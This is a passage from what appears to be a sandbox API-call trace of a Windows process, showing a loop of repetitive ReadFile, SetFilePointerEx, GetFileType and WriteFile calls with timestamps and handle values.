lpOverlapped=0x0) returned 1 [0127.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.228] GetFileType (hFile=0x50) returned 0x1 [0127.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.228] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.228] GetFileType (hFile=0x50) returned 0x1 [0127.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] GetFileType (hFile=0x50) returned 0x1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] GetFileType (hFile=0x50) returned 0x1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] GetFileType (hFile=0x50) returned 0x1 [0127.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.229] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.241] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0127.241] GetFileType (hFile=0x50) returned 0x1 [0127.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.241] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.241] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.241] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.241] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.241] GetFileType (hFile=0x50) returned 0x1 [0127.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.242] GetFileType (hFile=0x50) returned 0x1 [0127.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.243] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=4) returned 
0x58 [0127.243] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] GetFileType (hFile=0x50) returned 0x1 [0127.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.243] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) 
returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.244] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.244] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] GetFileType (hFile=0x50) returned 0x1 [0127.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.244] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, 
lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, 
lpOverlapped=0x0) returned 1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] GetFileType (hFile=0x50) returned 0x1 [0127.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.245] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.246] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.246] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, 
lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] GetFileType (hFile=0x50) returned 0x1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.246] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.247] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.247] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.247] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0127.247] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.247] GetFileType (hFile=0x50) returned 0x1 [0127.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] GetFileType (hFile=0x50) returned 0x1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] GetFileType (hFile=0x50) returned 0x1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] 
GetFileType (hFile=0x50) returned 0x1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] GetFileType (hFile=0x50) returned 0x1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.248] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.249] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.249] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | 
out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.249] GetFileType (hFile=0x50) returned 0x1 [0127.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] GetFileType (hFile=0x50) returned 0x1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] GetFileType (hFile=0x50) returned 0x1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] GetFileType (hFile=0x50) returned 0x1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, 
lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] GetFileType (hFile=0x50) returned 0x1 [0127.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.250] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.251] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.251] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.251] GetFileType (hFile=0x50) returned 0x1 [0127.251] _get_osfhandle (_FileHandle=1) returned 0x50 
